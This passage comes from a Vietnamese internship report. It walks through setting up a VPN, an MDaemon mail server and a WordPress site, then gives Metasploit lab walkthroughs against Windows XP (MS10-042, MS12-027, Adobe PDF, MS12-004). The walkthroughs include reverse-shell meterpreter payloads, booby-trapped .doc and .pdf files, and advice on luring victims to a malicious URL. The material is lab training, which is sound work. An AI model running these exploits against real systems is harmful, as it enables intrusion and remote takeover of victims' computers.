Nhập dãy địa chỉ bắt đầu vào Start IP address và dãy địa chỉ kết thúc vvào End IP address
và Click OK để chấp nhận.

89. Như vậy chúng ta đã hoàn tất cấu hình cho phép có thể truy cập VPN vào máy chủ.
Tiếp theo ta cần tạo tài khoản để có thể đăng nhập vào máy chủ. Bằng cách Right click
vào My conputer và chọn Manage
Tiếp theo ta vào System tools >Local Users and Groups >Users Right Click vào User và
chọn New User
Điền tên và password cho User .Click Create để tạo user. Tương tự tạo User client2

90. Để User có quyền truy cập VPN ta right click vào tài khoản chọn. Properties Sang tab
Dial-in và chọn Allow Access để cấp quyền và click OK.Tương tự cho user Client2
Chuẩn bị 2 máy ảo. Trên máy ảo thứ 1 ta vào Start >Settings > Network Connections.
Click vào Create a new Connection
Hộp thoại New Connection Wizard hiện lên và click Next> Chọn mục Connect to the
Network at my workplace và click Next

91. Click chọn Virual Private Network connection và chọn Next> Nhập tên công ty vào ô
company name và click Next
Click Do not dial the intial connection và click Next> Nhập địa chỉ IP của máy chủ hoặc
tên domain đã đăng ký và click Next

92. Chọn Anyone‟s use và click Next> Chọn Add a shortcut to this connection to my desktop
để thuận tiện cho lần kết nối sau và click Finish để hoàn tất
Màn hình đăng nhập hiện lên ta nhập tên User và Password cần kết nối và click Connect.
Sau khi kết nối thành công thì bên góc phải màn hình sẽ có kết nối mạng thứ 2

93. Double click vào biểu tượng mạng kết nối >chuyển sang tab Details để xem chi tiết. Các
bước thực hiện tương tự cho Client 2. Và kết quả cho Client 2 như sau

94. Trên Client1 tiến hành ping đến địa chỉ Clien2. Và trên Client 2 ping đến địa chỉ Clien1
Trên Clien1 tiến hành share 1 folder cho Clien 2. Bằng cách tạo 1 folder >right click chọn
properties >tab sharing >chọn Share this folder >click OK.

95. Trên Client 2 vào Start >run >gõ //địa chỉ client2 (10.0.0.101 ) và click OK
Đã thấy được thư mục mà Client1 đã share.
Như vậy chúng ta đã hoản thành việc cài đặt và cấu hình VPN client to site.
2.3.2.2Mail Server thông qua máy chủ ảo VPS.
Đăng nhập máy ảo chủ VPS bằng công cụ Remote Desktop

96. Chúng ta tiến hành nhập User name và Password đã được cung cấp từ bên cho thuê để
truy cập vào
Đăng nhập vào máy chủ ảo. Dowload bộ cài đặt Mdeamon và chạy file Setup.exe Trước
tiên, bạn tải phiên bản MDaemon Mail Server mới nhất và bắt đầu quá trình cài đặt.
Bấm "Next" để tiếp tục

97. Đánh dấu vào ô "I have read and I agree with all the terms of this license agreement"
Chọn đường dẫn lưu trữ của chương trình, mặc định sẽ là ổ C hệ thống (ổ đĩa có cài hệ
điều hành Microsoft Windows).
Lựa chọn phiên bản cài đặt, nếu bạn có key đăng ký thì nhập vào ô phía dưới. Ở ví dụ sử
dụng là phiên bản free hoặc miễn phí 30 ngày của phiên bản Pro.

98. Tùy chọn các thông tim phù hợp với vị trí, ở đây là VietNam
Điền tiếp các thông tin đầy đủ như tên, số điện thoại, công ty, địa chỉ email, mã vùng :
Điền đúng thông tin về quy mô của tổ chức hoặc công ty :

99. Sau khi hoàn tất các bước trên, chọn "Next" để bắt đầu cài đặt :
Quá trình cài đặt diễn ra khoảng 5 phút.
Sau khi kết thúc, người sử dụng bắt đầu thiết lập, tùy chỉnh các thông số phù hợp :
Điền tên Domain chính xác ví dụ: tranvanlam.com

100. Điền địa chỉ DNS chính (Primary) và dự phòng (Backup)
Giữ nguyên lựa chọn "Setup MDaemon as a system service" Bấm „Next‟ >"Finish" để kết
thúc quá trình cài đặt và cấu hình ban đầu, bắt đầu sử dụng
Giao diện sau khi cài đặt thành công.

101. Tạo 1 tài khoảng mới vào Account >New Account
Nhập thông tin vào Email address và Email Password. Click OK để tạo tài khoảng Email.
Vào Mail. OutLook

102. Nhập tên hiện thị vào Display name và click Next> Nhập địa chỉ Email và Click Next
Cấu hình Out Look mail để quản lý mail cho tài khoản a1@tranvanlam.com.
Nhập địa chỉ IP vào 2 ô Incoming và Outgoing và click Next.

103. Nhập tên tài khoản và mật khẩu. Click Next.
Click Finish để hoàn tất cấu hình quản lý mail cho tài khoản a1@tranvanlam.com.
Tạo mail để kiểm ra việc gửi mail từ tài khoản a1@tranvanlam.comđến 1 email bất kỳ.vd
namvanlam73@gmail.com
Vào mail được gửi và kiểm tra Mail. Xem mail từ tài khoản a1@tranvanlam.com

104. Trả lời lại Mail của tài khoản a1@tranvanlam.com
Vào lại mail của tài khoản a1@tranvanlam.comvà đã nhận được hồi âm. Như vậy chúng
ta đã hoàn thành việc cài đặt và quản lý 1 mail Server trên phần mềm Mdeamon
2.3.2.3Web Server thông qua máy chủ ảo VPS.
XAMPP là một bộ công cụ lập trình PHP có thể cài đặt được trên nhiều nền tảng khác
nhau. Chữ X đầu tiên trong cụm từ XAMPP ám chỉ cross-platform nghĩa là XAMPP có
thể chạy trên Windows, Linux, Mac OS, Solaris, còn các ký tự còn lại mang các ý nghĩa
sau:
A = Apache, XAMPP bao gồm 1 Apache HTTP Server giúp chạy các ứng dụng
web.
M = MySQL, hệ quản trị cơ sở dữ liệu My SQL cũng được bao gồm trong
XAMPP.
P = PHP – ngôn ngữ lập trình PHP.
P = Perl – ngôn ngữ lập trình Perl.
Sau đây chúng ta cùng cài đặt và cấu hình Web Server bằng Xampp 1.7.3
Chúng ta dowload và tiến hành cài đặt bằng file

105. Bạn chọn ngôn ngữ cài đặt là English và nhấn OK để tiếp tục
Bạn nhấn Next ở màn hình tiếp theo.
Theo mặc định XAMPP sẽ được cài đặt vào ổ C theo đường dẫn C:xampp, bạn có thể
nhấn Browse và chọn đường dẫn cài đặt khác

106. Bạn nhận chọn các service kèm theo XAMPP trong mục SERVICE SECTION sau đó
nhấn Install để tiếp tục.
Màn hình hiển thị tiến độ cài đặt XAMPP hiện ra
Quá trình cài đặt XAMPP hoàn tất, bạn nhấn vào nút Finish kết thúc.

107. XAMPP sẽ tự động cài đặt các service mà bạn đã chọn ở mục SERVICE SECTION bên
trên, đầu tiên là Apache service.
Tiếp đó là MySQL service
Quá trình cài đặt các service hoàn tất, bạn nhấn OK để tiếp tục
Bạn nhấn OK ở màn hình tiếp theo để bật XAMPP Control Panel.

108. Sau khi cài đặt xong các bạn click Start ở mục Apache và MySql trong XAMOO Control
Panel Application.
Vào trình duyệt web và gõ vào localhost.Và chọn ngôn ngữ là English.

109. Sau khi chọn ngôn ngữ chúng ta và click pHp my admin.
Bạn nhập tên cơ sở dữ liệu vào ô create new database và click Create để tạo database

110. Và Databae đã được tạo.
Tiếp theo các bạn vào đường dẫn cài đặt xampphtdocs và copy mã nguồn wordpress mà
chúng ta đã dowload trên internet.
Vào thư mục wordpress mà chúng ta vừa mới copy xong và tìm file wp-
configsample.php và mở nó lên bằng word pad

111. Tìm và sửa thông tin lại như hình.
Đổi tên file vừa sửa chửa thành wp-config.php
Vào đường dần localhost/wordpre ss/wpadmin/install.php. Sau đó điền các thông tin cần
thiết

112. Sau đó click Cài đặt WordPess.
Cấu hình Wordpress thành công. Ta Clich Đăng Nhập

113. Bạn điền thông tin vừa thiết lập vừa rồi và click Đăng Nhập.
Màn hình sau khi đăng nhập thành công.

114. Ta vào Cài đặt Tổng Quan điền địa chỉ chúng ta muốn truy cập khi chúng ta lướt web
vào 2 ô Wordpress address và Site Address.
Và đây là trang chủ của trang Web chúng ta khi vừa tạo xong.

115. Và sau khi đã trang trí cho trang web của chúng ta.
Như vậy chúng ta đã hoàn thành việc tạo 1 trang web cho riêng mình

116. 2.3.3 Bảo mật Window
2.3.3.1 Khai thác lỗ hổng bảo mật trên Windows XP với mã lỗi MS10_042
Máy Hacker:
Hệ điều hành: Sử dụng Backtrack 5
IP: 192.168.132.137
Máy nạn nhân:
Hệ điều hành: Sử dụng Windows XP
IP: 192.168.132.138
Cách khai thác:
Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole
msf > search ms10_042copy đường dẫn, enter
Gõ use “dán đường dẫn vào”msf > use
exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec
Gõ show options msf >exploit(ms10_042_helpctr_xss_cmd_exec) > show options

117. Lần lượt gõ các lệnh sau:
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set SRVHOST 192.168.132.137
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set PAYLOAD
windows/meterpreter/reverse_tcp
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set LHOST 192.168.132.137
msf exploit(ms10_042_helpctr_xss_cmd_exec) > exploit
Sau khi gõ lệnh exploit để khai thác lỗi ta sẽ thấy chương trình đưa ra cho ta 1 URL
website, lúc này chỉ cần dụ nạn nhân nhập vào URL này, ta sẽ tấn công được máy nạn
nhân.
Ở đây URL là: http://192.168.132.137:80/

118. Chương trình này sẽ dựa vào lỗi và sẽ mở ra Help and Support Center của máy nạn nhân
Backtrack gửi mã độc qua cho máy nạn nhân
Gõ lệnh sessions để coi Session đang thực hiện, ta thấy có 1 Session đang thực hiện tấn
công tới máy 192.168.132.138 trên port 1207
Gõ lệnh sessions –i 1

119. Ta đã tấn công được vào máy nạn nhân, ta thấy máy nạn nhân là Windows XP 32 bit.
Xem thông tin ổ đĩa máy nạn nhân, tạo thử thư mục Khoinv
OK, ta đã thâm nhập thành công!.

120. 2.3.3.2 Khai thác lỗ hổng bảo mật trên Window XP với mã lỗi MS12_027
Mô hình bài Lab
Máy Hacker:
Hệ điều hành: Sử dụng Backtrack 5
IP: 192.168.119.132
Máy nạn nhân:
Hệ điều hành: Sử dụng Windows XP
IP: 192.168.119.129
Cách khai thác:
Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole
msf > search ms12_027copy đường dẫn, enter
Gõ use “dán đường dẫn vào”msf > use
exploit/windows/fileformat/ms12_027_mscomctl_bof
Gõ lệnh show options msf > exploit(ms12_027_mscomctl_bof) > show options

121. Ở đây ta thấy bắt buộc phải tạo FILENAME
Lần lượt gõ các lệnh:
msf exploit(ms12_027_mscomctl_bof) > set filename filemadoc.doc
Ta sẽ thấy có một file filemadoc.doc được tạo ra (đây chỉ là ví dụ các bạn đặt tên theo ý
mình thích)
msf exploit(ms12_027_mscomctl_bof) > set payload
windows/meterpreter/reverse_tcp
msf exploit(ms12_027_mscomctl_bof) > set LHOST 192.168.119.132
Địa chỉ này là địa chỉ IP của máy Hacker chính là máy BackTrack.
msf exploit(ms12_027_mscomctl_bof) > exploit
Gõ lệnh exploit để thực thi
msf exploit(ms12_027_mscomctl_bof) > cp /root/.msf4/local/filemadoc.doc
/root/Desktop
ta copy file “filemadoc.doc” đã được tạo ra ngoài Desktop cho dễ sử dụng.
Vậy là việc tạo ra file chứa mã độc đã xong, giờ ta gửi file này cho nạn nhân để nạn nhân
chạy file này là sẽ bị dính mã độc. Trong môi trường lab nên mình dựng luôn một
Webserver để nạn nhân truy cập vào.Máy BackTrack đã hỗ trợ sẵn cho ta Webserver ta
chỉ việc chạy.

122. Upload file “filemadoc.doc” lên Webserver bằng cách đưa nó vào thư mục “/var/www”
Start Webserver ảo bằng lệnh
root@bt:~# service apache2 start
* Starting web server apache2 [OK]
Tạo ra một trình lắng nghe
msf exploit(ms12_027_mscomctl_bof) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.119.132
msf exploit(handler) > exploit
Giờ ta qua máy nạn nhân truy cập vào WEBSERVER ta đã dựng và tải file
“filemadoc.doc” về.
Khi nạn nhân mở file lên thì mã độc sẽ được tiêm vào.

123. Kiểm tra máy hacker ta thấy mã độc đã được tiêm vào máy nạn nhân
Mã độc đã được tiêm từ máy 192.168.119.132:4444 tới máy 192.168.119.129:1040
Giờ ta có thể khai thác được máy nạn nhân.Gõ getuid để thấy thông tin username, getinfo
để biết thông tin máy, ls C: để xem ổ đĩa, mkdir để tạo thư mục, … nói chung ta đã hoàn
toàn kiểm xoát được máy nạn nhân.

124. 2.3.3.3 Khai thác lỗ hổng bảo mật trên Window XP với lỗi Adobe Reader 9.X
Mô hình bài Lab
Máy Hacker:
Hệ điều hành: Sử dụng Backtrack 5
IP: 192.168.119.132
Máy nạn nhân:
Hệ điều hành: Sử dụng Windows XP
IP: 192.168.119.129
Cách khai thác:
Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole
msf > search adobe_pdfcopy đường dẫn, ở đây ta sử
dụng adobe_pdf_embedded_exe, enter
Gõ use “dán đường dẫn vào”msf > use
exploit/windows/fileformat/adobe_pdf_embedded_exe
Gõ lệnh show options msf >exploit(adobe_pdf_embedded_exe) > show options

125. Ở đây ta thấy bắt buộc phải tạo INFILENAME
Lần lượt gõ các lệnh:
msf exploit(adobe_pdf_embedded_exe) > set filename filemadoc.pdf
Copy sẵn 1 file pdf bất kỳ làm infilename, ở đây mình có sẵn 1 file infilename.pdf ngoài
Desktop.
msf exploit(adobe_pdf_embedded_exe) > set infilename
/root/Desktop/infilename.pdf
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.119.132
Địa chỉ này là địa chỉ IP của máy Hacker chính là máy BackTrack.
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD
windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > exploit
Ta sẽ thấy có một file filemadoc.pdf được tạo ra (đây chỉ là ví dụ các bạn đặt tên theo ý
mình thích), ta copy file “filemadoc.pdf” đã được tạo ra ngoài Desktop cho dễ sử dụng.
msf exploit(adobe_pdf_embedded_exe) > cp /root/.msf4/local/filemadoc.pdf
/root/Desktop
Vậy là việc tạo ra file chứa mã độc đã xong,.Trong môi trường lab nên mình dựng luôn
một Webserver để nạn nhân truy cập vào.Máy BackTrack đã hỗ trợ sẵn cho ta Webserver
ta chỉ việc chạy.

126. Upload file “filemadoc.pdf” lên Webserver bằng cách đưa nó vào thư mục “/var/www”
Start Webserver ảo bằng lệnh (mở một cửa số cmd khác).
root@bt:~# service apache2 start
* Starting web server apache2 [ OK ]
Giờ ta qua máy nạn nhân truy cập vào Webserver ta đã dựng và tải file “filemadoc.doc”
về.Khi nạn nhân mở file lên thì mã độc sẽ được tiêm vào.
Tạo ra một trình lắng nghe
msf exploit(adobe_pdf_embedded_exe) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) >set LHOST 192.168.119.132
msf exploit(handler) > exploit

127. Kiểm tra máy hacker ta thấy mã độc đã được tiêm vào máy nạn nhân
Mã độc đã được tiêm từ máy 192.168.119.132:4444 tới máy 192.168.119.129:1210
Giờ ta có thể khai thác được máy nạn nhân
Gõ getuid để thấy thông tin username, getinfo để biết thông tin máy, ls C: để xem ổ đĩa,
mkdir để tạo thư mục, … nói chung ta đã hoàn toàn kiểm xoát được máy nạn nhân.
2.3.3.4 Khai thác lỗ hổng bảo mật trên Windows XP với mã lỗi MS12_004
Máy Hacker:
Hệ điều hành: Sử dụng Backtrack 5
IP: 192.168.1.3
Máy nạn nhân:
Hệ điều hành: Sử dụng Windows XP
IP: 192.168.1.4
Cách khai thác:
Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole
msf > search ms12_004 copy đường dẫn, enter
Gõ use “dán đường dẫn vào”msf > use exploit/windows/browser/ms12_004_midi
Gõ lệnh show options : msf > exploit(ms12_004_midi) > show options

128. Lần lượt gõ các lệnh sau:
msf exploit(ms12_004_midi) > set SRVHOST 192.168.1.3
msf exploit(ms12_004_midi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms12_004_midi) > set LHOST 192.168.1.3
msf exploit(ms12_004_midi) > exploit
Sau khi gõ lệnh exploit để khai thác lỗi ta sẽ thấy chương trình đưa ra cho ta 1 URL
website, lúc này chỉ cần dụ nạn nhân nhập vào URL này, ta sẽ tấn công được máy nạn
nhân.
Ở đây URL là: http://192.168.1.3:8080/3SPoZF

129. Chương trình này sẽ dựa vào lỗi và sẽ yêu cầu bạn chạy phần mềm Windows Media
Player Extension trên máy nạn nhân
Backtrack gửi mã độc qua cho máy nạn nhân
Gõ lệnh sessions để coi Session đang thực hiện, ta thấy có 1 Session đang thực hiện tấn
công tới máy 192.168.1.4 trên port 1491

130. Gõ lệnh sessions –i 1
Ta đã tấn công được vào máy nạn nhân, ta thấy máy nạn nhân là Windows XP 32 bit.

131. 2.4 Các kết quả đạt được
Sau khi tìm hiểu và triển khai các dịch vụ trên máy ảo VMWare và VPS em đã có kiến
thức về:
 Nguyên lý cơ bản của hệ điều hành mạng, có kỹ năng cần thiết để cài đặt,cấu hình
hoàn chỉnh mạng doanh nghiệp cỡ vừa và lớn dựa vào Windows Server 2008.
 Hiểu về cấu trúc hạ tầng, thiết kế và quản trị hệ thống mạng,nhiệm vụ quản lý bao
gồm việc điều hành và hỗ trợ hệ thống
 Triển khai, thiết kế, quản lý và chuẩn đoán hỏng hóc cho một hệ thống mạng.
 Có các kiến thức trên nền tảng công nghệ Windows Server 2008.
2.4.1 Kinh nghiệm thực tế
Có cái nhìn thực tế về việc cấu hình, quản lý một hệ thống mạng của một
doanh nghiệp thông qua nền tảng.
Được trực tiếp tiếp xúc những công nghệ và thiết bị mà trước đây chỉ biết đến
thông qua sách vở.
Được vận dụng những kiến thức tiếp thu trên lớp vào công việc thực tế.
Bổ sung và trau dồi những thiếu sót về kiến thức trong quá trình học trên lớp.
Trực tiếp triển khai và cấu hình trên máy chủ ảo VPS.
Có kinh nghiệm trong việc khắc phục sự cố khi hệ thống gặp lỗi.
2.4.2 Hoàn thiện bản thân
Định hướng rõ ràng mục tiêu sắp tới sẽ làm.
Tự tin hơn trong việc giao tiếp với mọi người trong công việc.
Nâng cao khả năng làm việc nhóm cũng như khả năng tự bản thân giải quyết
vấn đề khó khăn gặp phải trong công việc.
2.4.3 Các kiến thức được lĩnh hội
Kiến thức thực tế về hệ thống mạng của doanh nghiệp.
Hiểu các thành phần công nghệ mạng doanh nghiệp vừa và nhỏ

132. Chương III. Kết Luận
Nhìn chung các công việc em đã cơ bản hoàn thành, tuy nhiên sẽ còn nhiều thiếu sót, đa
phần là quá trình tự học. Vì thế mong Thầy cô, các bạn đánh giá và đưa ra những ý kiến
đóng góp để khắc phục và sữa chữa.Bên cạnh trình độ chuyên môn cũng cần có những kỹ
năng mềm như kỹ năng giao tiếp, làm việc nhóm cũng hết sức quan trọng. Thực tập là
giai đoạn quan trọng của sinh viên, giúp sinh viên có cơ hội làm việc thực tế nhằm củng
cố kĩ năng, chuẩn bị cho giai đoạn làm việc thật sau khi tốt nghiệp.Trong quá trình thực
tập tại Trung tâm ATHENA, em được tiếp xúc với một môi trường làm việc chuyên
nghiệp, các công nghệ, thiết bị,các mô hình thực tế... Qua đó nhóm học hỏi được những
kinh nghiệm nhất định và có những suy nghĩ đóng góp sau:
 Về công việc: Để thiết kế và triển khai một hệ thống mạng cho một công ty, cần có
nhiều bộ phận phối hợp với nhau để thực hiện và hoàn thành dự án.
 Về phát triển kỹ năng:Để các bộ phận có thể phối hợp tốt mỗi nhân viên cần có
những kỹ năng cơ bản để làm việc trong đội, nhóm:
Làm việc nhóm: Kỹ năng làm việc nhóm là khả năng làm việc hiệu quả trong
đội ngũ. Đó là việc có thể sử dụng đúng người để có được kết quả tốt nhất và
luôn sẵn sàng để có thể lãnh đạo hoặc phối hợp làm theo.
Tìm hiểu – thu thập thông tin: Quản lý thông tin là khả năng biết được nơi để
có được thông tin cần thiết - để tìm kiếm, định vị, và thu thập nó. Điều này có
thể liên quan đến việc sử dụng các nguồn lực khác nhau, cho dù chúng là từ
những con người hoặc từ các tài liệu trong thế giới rộng lớn của công nghệ.
Kỹ năng giải quyết vấn đề - Tính linh hoạt : Tính linh hoạt là khả năng thích
nghi để giải quyết công việc chúng ta gặp phải hàng ngày trong công việc lẫn
đời sống riêng. Giải quyết vấn đề là xác định vấn đề, nghiên cứu giải pháp và
đưa ra những quyết định hiệu quả.
 Về công nghệ: với lợi thế là công ty hoạt động trong lĩnh vực công nghệ thông tin
,ATHENA có hạ tầng CNTT hiện đại ,an toàn và thông suốt

133. TÀI LIỆU THAM KHẢO
[1] http://athena.edu.vn
[2] http://www.youtube.com/ThangVoDo
[3] Barrie Dempster - Kerry Garrison, TrixBox Made Easy, Packt Publishing, 2006.
[4] Theodore Wallingford, VoIP Hacks, O'Reilly Media, 2006
[5] Paul Mahle, VoIP telephony with Asterisk, Mahler, 2004
[6] http:///www.voip-info.org
[7] http://google.com
[8] http://www.quantrimang.com
[9] http://thuvien-it.net
[10] http://www.slideshare.net/DuyNguyen82/bao-cao-ck-update-final
[11] http://nvkhoiit.blogspot.com/search/label/HACKING%20-%20SECURITY%20-
%20CEH
[12] www.youtube.com/channel/trojan-backdoor-athena